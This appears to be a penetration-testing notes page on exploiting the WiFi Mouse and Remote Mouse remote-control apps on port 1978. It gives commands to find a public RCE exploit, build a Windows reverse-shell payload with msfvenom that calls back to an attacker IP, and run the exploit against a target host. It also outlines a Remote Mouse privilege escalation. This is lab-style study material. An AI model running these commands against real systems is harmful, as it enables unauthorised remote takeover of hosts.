1978 - WiFi Mouse

WiFi Mouse

WiFi Mousearrow-up-right is a cross-platform application that allows a mobile device to function as a wireless mouse, keyboard, and touchpad for a host computer. It communicates over a local network using TCP/IP and typically listens on specific ports (such as 1978) to receive input events. The software enables control of the host system without physical interaction, supporting gestures, media controls, and basic keyboard input. From a security perspective, if the control port is exposed to untrusted networks or lacks authentication, an attacker could remotely send input events, execute commands, or manipulate the host system.

Unauthenticated RCE

WiFi Mouse version 1.7.8.5 is vulnerable to unauthenticated RCE due to insecure command parsing. A working Python-based PoCarrow-up-right is available.

# Search for PoC
$ searchsploit WiFi Mouse

WiFi Mouse 1.7.8.5 - Remote Code Execution(v2) | windows/remote/50972.py

# Generate the payload
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=4444 -f exe -o 1978.exe

# Use the exploit
$ python3 50972.py hermes 192.168.45.154:8888 1978.exe

Remote Mouse

Remote Mousearrow-up-right is a similar to WiFi Mouse application that transforms mobile devices into remote input controllers for desktop or laptop computers providing a similar functionality.

Unauthenticated RCE

Various Python-based PoCs are available for this vulnerability.

The RemoteMouse-3.008-Exploitarrow-up-right can be used as follows:

The 46697arrow-up-right can be used with slight modifications:

A safer approach can be also used:

circle-exclamation

Privilege Escalation (GUI)

Emote Interactive Remote Mouse version 3.008 on Windows is affected by a privilege escalation vulnerability that allows attackers to execute arbitrary programs with administrative privileges (CVE-2021-35448arrow-up-right). The flaw resides in the Image Transfer Folder feature, which can be manipulated to navigate to cmd.exe and launch it as Administrator. The application binds to local TCP ports to accept incoming connections, creating an attack surface that can be abused if exposed or accessible by untrusted users. Steps for exploiting this vulnerability can be found herearrow-up-right.

Last updated